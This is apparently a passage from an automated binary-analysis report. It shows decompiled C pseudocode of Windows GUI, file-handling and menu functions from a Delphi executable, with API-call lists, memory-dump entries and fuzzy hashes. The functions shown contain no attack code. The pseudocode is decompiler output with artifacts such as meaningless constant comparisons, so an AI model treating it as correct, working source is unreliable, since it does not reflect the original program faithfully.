                                                                                					L00407080();
                                                                                					L00406A58();
                                                                                					_v8 = _t47;
                                                                                					_v16 = SelectObject(_v8, _v12);
                                                                                					 *[fs:eax] = _t114;
                                                                                					_t55 = BeginPaint(E0043BD14(_t83),  &_v80);
                                                                                					E00436848(_t83, _v8, 0x14, _v8);
                                                                                					 *((intOrPtr*)(_t108 + 4)) = _v8;
                                                                                					E00439F44(_t83, _t108);
                                                                                					 *((intOrPtr*)(_t108 + 4)) = 0;
                                                                                					 *((intOrPtr*)( *_t83 + 0x44))(_v8, 0, 0, 0xcc0020,  *[fs:eax], 0x43a096, _t111, 0, 0, __eax, __eax, _t47, _v84, 0);
                                                                                					 *((intOrPtr*)( *_t83 + 0x44))(_v84);
                                                                                					_push(_v104);
                                                                                					_push(0);
                                                                                					_push(0);
                                                                                					L00406A30();
                                                                                					EndPaint(E0043BD14(_t83),  &_v80);
                                                                                					_t102 = _t55;
                                                                                					 *[fs:eax] = _t102;
                                                                                					_push(0x43a09d);
                                                                                					SelectObject(_v8, _v16);
                                                                                					DeleteDC(_v8);
                                                                                					return DeleteObject(_v12);
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • 72E7AC50.USER32(00000000), ref: 00439F8F
                                                                                • 72E7A520.GDI32(00000000,?), ref: 00439FB3
                                                                                • 72E7B380.USER32(00000000,00000000,00000000,?), ref: 00439FBE
                                                                                • 72E7A590.GDI32(00000000,00000000,00000000,00000000,?), ref: 00439FC5
                                                                                • SelectObject.GDI32(00000000,?), ref: 00439FD5
                                                                                • BeginPaint.USER32(00000000,?,00000000,0043A096,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00439FF7
                                                                                • 72E897E0.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043A053
                                                                                • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043A064
                                                                                • SelectObject.GDI32(00000000,?), ref: 0043A07E
                                                                                • DeleteDC.GDI32(00000000), ref: 0043A087
                                                                                • DeleteObject.GDI32(?), ref: 0043A090
                                                                                  • Part of subcall function 00439A64: BeginPaint.USER32(00000000,?), ref: 00439A8A
                                                                                  • Part of subcall function 00439A64: EndPaint.USER32(00000000,?,00439B8B), ref: 00439B7E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Paint$Object$BeginDeleteSelect$A520A590B380E897
                                                                                • String ID:
                                                                                • API String ID: 3782911080-0
                                                                                • Opcode ID: 6a9e0f0aa6bc594f610b22cb0e1bc7e759010655ccbd2b8d161eadcb6350d9a1
                                                                                • Instruction ID: 306c7afd92af40a217dbe2fff1c1d45e4c1a113081206cfcf9a7c14f3e5101a4
                                                                                • Opcode Fuzzy Hash: 6a9e0f0aa6bc594f610b22cb0e1bc7e759010655ccbd2b8d161eadcb6350d9a1
                                                                                • Instruction Fuzzy Hash: 5A412E71B00204AFD710EFA9CC85B9EB7F9AF4D704F10447AB91AEB291DA78AD058B54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 82%
                                                                                			E0041F5A8(intOrPtr* __eax, intOrPtr* __ecx, int* __edx, intOrPtr _a4, int* _a8) {
                                                                                				intOrPtr* _v8;
                                                                                				intOrPtr* _v12;
                                                                                				int _v16;
                                                                                				int _v20;
                                                                                				int _v24;
                                                                                				long _v28;
                                                                                				long _v32;
                                                                                				struct HDC__* _v36;
                                                                                				intOrPtr* _v40;
                                                                                				void* _v44;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				void* _t116;
                                                                                				void* _t124;
                                                                                				struct HDC__* _t191;
                                                                                				int* _t196;
                                                                                				intOrPtr _t204;
                                                                                				intOrPtr _t208;
                                                                                				intOrPtr _t209;
                                                                                				intOrPtr _t210;
                                                                                				int _t216;
                                                                                				int* _t218;
                                                                                				void* _t221;
                                                                                				void* _t223;
                                                                                				intOrPtr _t224;
                                                                                
                                                                                				_t198 = __ecx;
                                                                                				_t221 = _t223;
                                                                                				_t224 = _t223 + 0xffffffd8;
                                                                                				_v12 = __ecx;
                                                                                				_t218 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_t196 = _a8;
                                                                                				if(_v12 != 0) {
                                                                                					E0041FA80(_v8);
                                                                                					 *[fs:eax] = _t224;
                                                                                					 *((intOrPtr*)( *_v8 + 0x10))( *[fs:eax], 0x41f84e, _t221);
                                                                                					_t204 =  *0x41f860; // 0x9
                                                                                					E0041FE98(_v8, __ecx, _t204);
                                                                                					E0041FA80(E00423F28(_v12));
                                                                                					_push(_t221);
                                                                                					_push(0x41f829);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t224;
                                                                                					_v20 = _t218[2] -  *_t218;
                                                                                					_v24 = _t218[3] - _t218[1];
                                                                                					_t216 = _t196[2] -  *_t196;
                                                                                					_v16 = _t196[3] - _t196[1];
                                                                                					if(E00424014(_v12, _t198) != _a4) {
                                                                                						_v40 = E00423960(1);
                                                                                						_t198 =  *_v40;
                                                                                						 *((intOrPtr*)( *_v40 + 8))();
                                                                                						E00424188(_v40, _a4, __eflags);
                                                                                						_t116 = E00423F28(_v40);
                                                                                						_t208 =  *0x41f864; // 0x1
                                                                                						E0041FE98(_t116,  *_v40, _t208);
                                                                                						_v36 =  *((intOrPtr*)(E00423F28(_v40) + 4));
                                                                                						__eflags = 0;
                                                                                						_v44 = 0;
                                                                                					} else {
                                                                                						_v40 = 0;
                                                                                						_t191 =  *((intOrPtr*)( *_v12 + 0x68))();
                                                                                						_v44 = _t191;
                                                                                						_push(0);
                                                                                						L00406A58();
                                                                                						_v36 = _t191;
                                                                                						_v44 = SelectObject(_v36, _v44);
                                                                                					}
                                                                                					_push(_t221);
                                                                                					_push(0x41f807);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t224;
                                                                                					_t124 = E00423F28(_v12);
                                                                                					_t209 =  *0x41f864; // 0x1
                                                                                					E0041FE98(_t124, _t198, _t209);
                                                                                					if(E0041F44C( *((intOrPtr*)(_v8 + 0x14))) != 1) {
                                                                                						StretchBlt( *(_v8 + 4),  *_t218, _t218[1], _v20, _v24,  *(E00423F28(_v12) + 4),  *_t196, _t196[1], _t216, _v16, 0xcc0020);
                                                                                						_v32 = SetTextColor( *(_v8 + 4), 0);
                                                                                						_v28 = SetBkColor( *(_v8 + 4), 0xffffff);
                                                                                						StretchBlt( *(_v8 + 4),  *_t218, _t218[1], _v20, _v24, _v36,  *_t196, _t196[1], _t216, _v16, 0xe20746);
                                                                                						SetTextColor( *(_v8 + 4), _v32);
                                                                                						SetBkColor( *(_v8 + 4), _v28);
                                                                                					} else {
                                                                                						E00420360( *(_v8 + 4), _t196, _t218[1],  *_t218, _t216, _t218, _t196[1],  *_t196, _v36, _v16, _t216, _t196[1],  *_t196,  *(E00423F28(_v12) + 4), _v24, _v20);
                                                                                					}
                                                                                					_pop(_t210);
                                                                                					 *[fs:eax] = _t210;
                                                                                					_push(E0041F80E);
                                                                                					if(_v40 == 0) {
                                                                                						__eflags = _v44;
                                                                                						if(_v44 != 0) {
                                                                                							SelectObject(_v36, _v44);
                                                                                						}
                                                                                						return DeleteDC(_v36);
                                                                                					} else {
                                                                                						return E004035B4(_v40);
                                                                                					}
                                                                                				}
                                                                                				return __eax;
                                                                                 			}

                                                                                APIs
                                                                                  • Part of subcall function 0041FA80: RtlEnterCriticalSection.KERNEL32(00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA88
                                                                                  • Part of subcall function 0041FA80: RtlLeaveCriticalSection.KERNEL32(00487A5C,00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA95
                                                                                  • Part of subcall function 0041FA80: RtlEnterCriticalSection.KERNEL32(00000038,00487A5C,00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA9E
                                                                                • 72E7A590.GDI32(00000000), ref: 0041F64B
                                                                                • SelectObject.GDI32(?,?), ref: 0041F65B
                                                                                • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00CC0020), ref: 0041F753
                                                                                • SetTextColor.GDI32(?,00000000), ref: 0041F761
                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 0041F775
                                                                                • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00E20746), ref: 0041F7A8
                                                                                • SetTextColor.GDI32(?,?), ref: 0041F7B8
                                                                                • SetBkColor.GDI32(?,?), ref: 0041F7C8
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041F7F8
                                                                                • DeleteDC.GDI32(?), ref: 0041F801
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Color$CriticalSection$EnterObjectSelectStretchText$A590DeleteLeave
                                                                                • String ID:
                                                                                • API String ID: 2975480410-0
                                                                                • Opcode ID: 8fade14a0b8bb6aa5a3d00aa6ebabbc3893095b24b0ee73f5b28fa93de154169
                                                                                • Instruction ID: 56eeb733055bb1c0b9ac4d539382dbe7af899076f26b7cfa990cf846c4f30ea4
                                                                                • Opcode Fuzzy Hash: 8fade14a0b8bb6aa5a3d00aa6ebabbc3893095b24b0ee73f5b28fa93de154169
                                                                                • Instruction Fuzzy Hash: 3591C675A00118EFCB40EFA9D981E9EBBF8EF0D304B5544AAF508EB251C638ED45CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00439BC0(void* __eax, void* __ecx, struct HDC__* __edx) {
                                                                                				struct tagRECT _v44;
                                                                                				struct tagRECT _v60;
                                                                                				void* _v68;
                                                                                				int _v80;
                                                                                				int _t79;
                                                                                				void* _t134;
                                                                                				int _t135;
                                                                                				void* _t136;
                                                                                				void* _t159;
                                                                                				void* _t160;
                                                                                				void* _t161;
                                                                                				struct HDC__* _t162;
                                                                                				intOrPtr* _t163;
                                                                                
                                                                                				_t163 =  &(_v44.bottom);
                                                                                				_t134 = __ecx;
                                                                                				_t162 = __edx;
                                                                                				_t161 = __eax;
                                                                                				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
                                                                                					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
                                                                                				}
                                                                                				_t78 =  *((intOrPtr*)(_t161 + 0x198));
                                                                                				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
                                                                                					L17:
                                                                                					_t79 =  *(_t161 + 0x19c);
                                                                                					if(_t79 == 0) {
                                                                                						L27:
                                                                                						return _t79;
                                                                                					}
                                                                                					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
                                                                                					if(_t79 < 0) {
                                                                                						goto L27;
                                                                                					}
                                                                                					_v44.right = _t79 + 1;
                                                                                					_t159 = 0;
                                                                                					do {
                                                                                						_t79 = E00413FA4( *(_t161 + 0x19c), _t159);
                                                                                						_t135 = _t79;
                                                                                						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
                                                                                							_v44.left = CreateSolidBrush(E0041E68C(0x80000010));
                                                                                							E00412984( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
                                                                                							FrameRect(_t162,  &_v44, _v44);
                                                                                							DeleteObject(_v60.right);
                                                                                							_v60.left = CreateSolidBrush(E0041E68C(0x80000014));
                                                                                							E00412984( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
                                                                                							FrameRect(_t162,  &_v60, _v60);
                                                                                							_t79 = DeleteObject(_v68);
                                                                                						}
                                                                                						_t159 = _t159 + 1;
                                                                                						_t75 =  &(_v44.right);
                                                                                						 *_t75 = _v44.right - 1;
                                                                                					} while ( *_t75 != 0);
                                                                                					goto L27;
                                                                                				}
                                                                                				_t160 = 0;
                                                                                				if(_t134 != 0) {
                                                                                					_t160 = E00414000(_t78, _t134);
                                                                                					if(_t160 < 0) {
                                                                                						_t160 = 0;
                                                                                					}
                                                                                				}
                                                                                				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
                                                                                				if(_t160 <  *_t163) {
                                                                                					do {
                                                                                						_t136 = E00413FA4( *((intOrPtr*)(_t161 + 0x198)), _t160);
                                                                                						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
                                                                                							E00412984( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
                                                                                							if(RectVisible(_t162,  &(_v44.top)) != 0) {
                                                                                								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
                                                                                									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
                                                                                								}
                                                                                								_v60.top = SaveDC(_t162);
                                                                                								E00433FDC(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
                                                                                								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
                                                                                								E00436848(_t136, _t162, 0xf, 0);
                                                                                								RestoreDC(_t162, _v80);
                                                                                								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
                                                                                							}
                                                                                						}
                                                                                						_t160 = _t160 + 1;
                                                                                					} while (_t160 < _v60.top);
                                                                                				}
                                                                                			}

















                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                • String ID:
                                                                                • API String ID: 375863564-0
                                                                                • Opcode ID: 90185039d72083636e0d9542b1f8aeae172046c567a2dd13c7c3ec0bbf9e28ba
                                                                                • Instruction ID: ceb3e369153146217064650c0b56690f9fbafe8079a4cddf4b1ed266614cb7ac
                                                                                • Opcode Fuzzy Hash: 90185039d72083636e0d9542b1f8aeae172046c567a2dd13c7c3ec0bbf9e28ba
                                                                                • Instruction Fuzzy Hash: F4517F712042449FDB18EF29C8C4B9B77E8AF49308F04545EFD89CB296D678EC45CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 70%
                                                                                			E00402B18(void** __eax) {
                                                                                				long _t29;
                                                                                				void* _t31;
                                                                                				long _t34;
                                                                                				void* _t38;
                                                                                				void* _t40;
                                                                                				long _t41;
                                                                                				int _t44;
                                                                                				void* _t46;
                                                                                				long _t54;
                                                                                				long _t55;
                                                                                				void* _t58;
                                                                                				void** _t59;
                                                                                				DWORD* _t60;
                                                                                
                                                                                				_t59 = __eax;
                                                                                				 *((intOrPtr*)(__eax + 0xc)) = 0;
                                                                                				 *((intOrPtr*)(__eax + 0x10)) = 0;
                                                                                				if(0xffffffffffff284f == 0) {
                                                                                					_t29 = 0x80000000;
                                                                                					_t55 = 1;
                                                                                					_t54 = 3;
                                                                                					 *((intOrPtr*)(__eax + 0x1c)) = 0x402a6c;
                                                                                				} else {
                                                                                					if(0xffffffffffff284f == 0) {
                                                                                						_t29 = 0x40000000;
                                                                                						_t55 = 1;
                                                                                						_t54 = 2;
                                                                                					} else {
                                                                                						if(0xffffffffffff284f != 0) {
                                                                                							return 0xffffffffffff284d;
                                                                                						}
                                                                                						_t29 = 0xc0000000;
                                                                                						_t55 = 1;
                                                                                						_t54 = 3;
                                                                                					}
                                                                                					_t59[7] = E00402AAC;
                                                                                				}
                                                                                				_t59[9] = E00402AF8;
                                                                                				_t59[8] = E00402AA8;
                                                                                				if(_t59[0x12] == 0) {
                                                                                					_t59[2] = 0x80;
                                                                                					_t59[9] = E00402AA8;
                                                                                					_t59[5] =  &(_t59[0x53]);
                                                                                					if(_t59[1] == 0xd7b2) {
                                                                                						if(_t59 != 0x4873e4) {
                                                                                							_push(0xfffffff5);
                                                                                						} else {
                                                                                							_push(0xfffffff4);
                                                                                						}
                                                                                					} else {
                                                                                						_push(0xfffffff6);
                                                                                					}
                                                                                					_t31 = GetStdHandle();
                                                                                					if(_t31 == 0xffffffff) {
                                                                                						goto L37;
                                                                                					}
                                                                                					 *_t59 = _t31;
                                                                                					goto L30;
                                                                                				} else {
                                                                                					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
                                                                                					if(_t38 == 0xffffffff) {
                                                                                						L37:
                                                                                						_t59[1] = 0xd7b0;
                                                                                						return GetLastError();
                                                                                					}
                                                                                					 *_t59 = _t38;
                                                                                					if(_t59[1] != 0xd7b3) {
                                                                                						L30:
                                                                                						if(_t59[1] == 0xd7b1) {
                                                                                							L34:
                                                                                							return 0;
                                                                                						}
                                                                                						_t34 = GetFileType( *_t59);
                                                                                						if(_t34 == 0) {
                                                                                							CloseHandle( *_t59);
                                                                                							_t59[1] = 0xd7b0;
                                                                                							return 0x69;
                                                                                						}
                                                                                						if(_t34 == 2) {
                                                                                							_t59[8] = E00402AAC;
                                                                                						}
                                                                                						goto L34;
                                                                                					}
                                                                                					_t59[1] = _t59[1] - 1;
                                                                                					_t40 = GetFileSize( *_t59, 0) + 1;
                                                                                					if(_t40 == 0) {
                                                                                						goto L37;
                                                                                					}
                                                                                					_t41 = _t40 - 0x81;
                                                                                					if(_t41 < 0) {
                                                                                						_t41 = 0;
                                                                                					}
                                                                                					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
                                                                                						goto L37;
                                                                                					} else {
                                                                                						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
                                                                                						_t58 = 0;
                                                                                						if(_t44 != 1) {
                                                                                							goto L37;
                                                                                						}
                                                                                						_t46 = 0;
                                                                                						while(_t46 < _t58) {
                                                                                							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
                                                                                								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
                                                                                									goto L37;
                                                                                								} else {
                                                                                									goto L30;
                                                                                								}
                                                                                							}
                                                                                							_t46 = _t46 + 1;
                                                                                						}
                                                                                						goto L30;
                                                                                					}
                                                                                				}
                                                                                			}

















                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BA0
                                                                                • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BC4
                                                                                • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BE0
                                                                                • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402C01
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402C2A
                                                                                • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402C38
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00402C73
                                                                                • GetFileType.KERNEL32(?,000000F5), ref: 00402C89
                                                                                • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402CA4
                                                                                • GetLastError.KERNEL32(000000F5), ref: 00402CBC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                • String ID:
                                                                                • API String ID: 1694776339-0
                                                                                • Opcode ID: 64ad8ea4c2b16f1e38e7f37a0d7e461a096d8fcf753019cf723aaf91f24c5d7a
                                                                                • Instruction ID: c7a4ebb683dc642720d6c14f3ce292b160b37a6f3a2b11c4ffb55bc8aa658509
                                                                                • Opcode Fuzzy Hash: 64ad8ea4c2b16f1e38e7f37a0d7e461a096d8fcf753019cf723aaf91f24c5d7a
                                                                                • Instruction Fuzzy Hash: 1D41A170108700AAF7309F24CB0DB2B76E5AB41754F208A3FE596B66E0E7FDA841974D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00450F98(intOrPtr _a4) {
                                                                                				intOrPtr _t27;
                                                                                				struct HMENU__* _t48;
                                                                                
                                                                                				_t27 =  *((intOrPtr*)(_a4 - 4));
                                                                                				if( *((char*)(_t27 + 0x229)) != 0) {
                                                                                					_t27 =  *((intOrPtr*)(_a4 - 4));
                                                                                					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
                                                                                						_t27 =  *((intOrPtr*)(_a4 - 4));
                                                                                						if( *((char*)(_t27 + 0x22f)) != 1) {
                                                                                							_t48 = GetSystemMenu(E0043BD14( *((intOrPtr*)(_a4 - 4))), 0);
                                                                                							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
                                                                                								DeleteMenu(_t48, 0xf130, 0);
                                                                                								DeleteMenu(_t48, 7, 0x400);
                                                                                								DeleteMenu(_t48, 5, 0x400);
                                                                                								DeleteMenu(_t48, 0xf030, 0);
                                                                                								DeleteMenu(_t48, 0xf020, 0);
                                                                                								DeleteMenu(_t48, 0xf000, 0);
                                                                                								return DeleteMenu(_t48, 0xf120, 0);
                                                                                							}
                                                                                							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
                                                                                								EnableMenuItem(_t48, 0xf020, 1);
                                                                                							}
                                                                                							_t27 =  *((intOrPtr*)(_a4 - 4));
                                                                                							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
                                                                                								return EnableMenuItem(_t48, 0xf030, 1);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t27;
                                                                                			}






                                                                                APIs
                                                                                • GetSystemMenu.USER32(00000000,00000000), ref: 00450FE3
                                                                                • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00451001
                                                                                • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045100E
                                                                                • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045101B
                                                                                • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00451028
                                                                                • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00451035
                                                                                • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00451042
                                                                                • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0045104F
                                                                                • EnableMenuItem.USER32 ref: 0045106D
                                                                                • EnableMenuItem.USER32 ref: 00451089
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Menu$Delete$EnableItem$System
                                                                                • String ID:
                                                                                • API String ID: 3985193851-0
                                                                                • Opcode ID: ffa875bfd80362b43f77e1a8893f16d689354b82d48917cc9e02a79fef38a4fe
                                                                                • Instruction ID: 0d157b5141c4730fac339518274e379f240c5fea68c2b1bb01df9476f5004e56
                                                                                • Opcode Fuzzy Hash: ffa875bfd80362b43f77e1a8893f16d689354b82d48917cc9e02a79fef38a4fe
                                                                                • Instruction Fuzzy Hash: 49218B703803447AF730AA24DC8EF697BD85F04B19F0180A5BA457F2E3C6B8E9D0964C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00409FFC(void* __edi) {
                                                                                				void _v1024;
                                                                                				char _v1088;
                                                                                				long _v1092;
                                                                                				void* _t10;
                                                                                				char* _t12;
                                                                                				intOrPtr _t14;
                                                                                				intOrPtr _t16;
                                                                                				intOrPtr _t22;
                                                                                				long _t26;
                                                                                				void* _t34;
                                                                                
                                                                                				E00409E74(_t10,  &_v1024, _t34, 0x400);
                                                                                				_t12 =  *0x486cc4; // 0x487048
                                                                                				if( *_t12 == 0) {
                                                                                					_t14 =  *0x486aa8; // 0x4074e4
                                                                                					_t7 = _t14 + 4; // 0xffe8
                                                                                					_t16 =  *0x487714; // 0x400000
                                                                                					LoadStringA(E00405A84(_t16),  *_t7,  &_v1088, 0x40);
                                                                                					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
                                                                                				}
                                                                                				_t22 =  *0x486af0; // 0x487218
                                                                                				E00402D0C(_t22);
                                                                                				_t26 = E00408B40( &_v1024, __edi);
                                                                                				WriteFile(GetStdHandle(0xfffffff5),  &_v1024, _t26,  &_v1092, 0);
                                                                                				return WriteFile(GetStdHandle(0xfffffff5), 0x40a0ac, 2,  &_v1092, 0);
                                                                                			}














                                                                                APIs
                                                                                  • Part of subcall function 00409E74: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409E91
                                                                                  • Part of subcall function 00409E74: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409EB5
                                                                                  • Part of subcall function 00409E74: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409ED0
                                                                                  • Part of subcall function 00409E74: LoadStringA.USER32 ref: 00409F66
